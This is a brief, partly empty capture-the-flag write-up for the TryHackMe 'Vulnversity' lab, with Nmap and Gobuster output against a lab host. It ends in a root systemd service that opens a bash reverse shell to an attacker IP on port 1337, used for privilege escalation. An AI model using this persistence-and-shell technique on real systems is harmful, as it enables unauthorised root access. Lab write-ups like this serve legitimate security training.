VulnUniversity

Room Link: https://tryhackme.com/room/vulnversity

Tools

Deploy the machine

Reconnaissance

Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-26 09:55 IST
Nmap scan report for 10.10.135.130
Host is up (0.20s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.77 seconds

Locating directories using Gobuster

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.65.81:3333
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/wordlist/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 318] [--> http://10.10.65.81:3333/images/]
/css                  (Status: 301) [Size: 315] [--> http://10.10.65.81:3333/css/]
/js                   (Status: 301) [Size: 314] [--> http://10.10.65.81:3333/js/]
/fonts                (Status: 301) [Size: 317] [--> http://10.10.65.81:3333/fonts/]
/internal             (Status: 301) [Size: 320] [--> http://10.10.65.81:3333/internal/]
Progress: 9932 / 1273834 (0.78%)

Compromise the Webserver

Privilege Escalation

[Unit]
Description=ZishanAdThandar

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.17.102.105/1337 0>&1'

[Install]
WantedBy=multi-user.target

Author: Zishan Ahamed Thandar